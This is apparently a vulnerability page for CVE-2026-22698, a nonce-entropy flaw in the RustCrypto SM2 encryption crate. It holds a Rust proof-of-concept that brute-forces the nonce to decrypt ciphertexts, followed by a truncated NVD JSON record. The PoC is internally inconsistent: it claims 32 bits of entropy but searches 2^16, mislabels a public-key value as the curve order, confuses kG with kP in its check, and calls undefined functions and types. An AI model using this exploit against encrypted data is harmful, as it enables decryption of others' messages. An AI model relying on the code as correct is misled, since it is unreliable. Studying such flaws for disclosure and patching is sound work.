CVE-2026-22698

// CVE-2026-22698 PoC - SM2 Nonce Entropy Reduction Attack // This PoC demonstrates the vulnerability where nonce k has only 32 bits of entropy // instead of the expected 256 bits. use sm2::{ PublicKey, EncryptedMessage, Ciphertext, ecies::{ECIESCiphertext, Nonce} }; use sm2::elliptic_curve::rand_core::OsRng; use sm2::elliptic_curve::group::ff::Field; fn exploit_cve_2026_22698( public_key: &PublicKey, ciphertext: &ECIESCiphertext ) -> Result<Vec<u8>, Box<dyn std::error::Error>> { // The vulnerability: nonce k only has 32 bits of entropy (2^16 possible values due to modular reduction) // Normal 256-bit nonce would be computationally infeasible to brute force let n = public_key.public_key().to_bytes(); // Get curve generator order // Brute force search for k (feasible due to 16-bit effective entropy) for k_guess in 0u32..65536u32 { // 2^16 iterations - trivial for modern hardware let k_scalar = sm2::Scalar::from(k_guess); // Calculate k * G to verify against ciphertext component let k_times_g = public_key.public_key() * k_scalar; // Derive shared secret using recovered k let shared_point = public_key.public_key() * k_scalar; let shared_x = shared_point.to_bytes(); // Attempt decryption with this k guess if try_decrypt_with_k(public_key, ciphertext, &k_scalar, &shared_x)? { println!("Found valid k: {}", k_guess); // Derive symmetric key and decrypt return decrypt_payload(ciphertext, &shared_x); } } Err("Failed to recover k".into()) } fn try_decrypt_with_k( pubkey: &PublicKey, ciphertext: &ECIESCiphertext, k: &sm2::Scalar, shared_secret: &[u8] ) -> Result<bool, Box<dyn std::error::Error>> { // Verify S = k * P matches ciphertext's S component let s_computed = pubkey.public_key() * k; Ok(s_computed.to_bytes() == ciphertext.s_component) } // Reference: https://github.com/RustCrypto/elliptic-curves/commit/e4f77788130d065d760e57fb109370827110a525

{"cve": {"id": "CVE-2026-22698", "sourceIdentifier": "[email protected]", "published": "2026-01-10T06:15:52.220", "lastModified": "2026-03-12T19:13:14.870", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "RustCrypto: Elliptic Curves is general purpose Elliptic Curve Cryptography (ECC) support, including types and traits for representing various elliptic curve forms, scalars, points, and public/secret keys composed thereof. In versions 0.14.0-pre.0 and 0.14.0-rc.0, a critical vulnerability exists in the SM2 Public Key Encryption (PKE) implementation where the ephemeral nonce k is generated with severely reduced entropy. A unit mismatch error causes the nonce generation function to request only 32 bits of randomness instead of the expected 256 bits. This reduces the security of the encryption from a 128-bit level to a trivial 16-bit level, allowing a practical attack to recover the nonce k and decrypt any ciphertext given only the public key and ciphertext. This issue has been patched via commit e4f7778."}, {"lang": "es", "value": "RustCrypto: Curvas Elípticas es soporte de Criptografía de Curva Elíptica (ECC) de propósito general, incluyendo tipos y rasgos para representar varias formas de curvas elípticas, escalares, puntos y claves públicas/secretas compuestas de ellos. En las versiones 0.14.0-pre.0 y 0.14.0-rc.0, existe una vulnerabilidad crítica en la implementación de Cifrado de Clave Pública (PKE) SM2 donde el nonce efímero k se genera con una entropía severamente reducida. Un error de desajuste de unidades hace que la función de generación de nonce solicite solo 32 bits de aleatoriedad en lugar de los 256 bits esperados. Esto reduce la seguridad del cifrado de un nivel de 128 bits a un nivel trivial de 16 bits, permitiendo un ataque práctico para recuperar el nonce k y descifrar cualquier texto cifrado dado solo la clave pública y el texto cifrado. Este problema ha sido parcheado a través del commit e4f7778."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-331"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:rustcrypto:sm2_elliptic_curve:0.14.0:pre0:*:*:*:rust:*:*", "matchCriteriaId": "5F5BCFE9-1585-4A90-857F-7F9E1B9C9ADA"}, {"vulnerable": true, "criteria": "cpe:2.3:a:rustcrypto:sm2_elliptic_curve:0.14.0:rc0:*:*:*:rust:*:*", "matchCriteriaId": "B584C50F-8ED4-45F4-8799-7CCFE8D4DF66"}]}]}], "references": [{"url": "https://crates.io/crates/sm2/0.14.0-pre.0", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://crates.io/crates/sm2/0.14.0-rc.0", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/RustCrypto/elliptic-curves/commit/4781762f23ff22ab34763410f648128055c93731", "source": "[email protected]", " ... (truncated)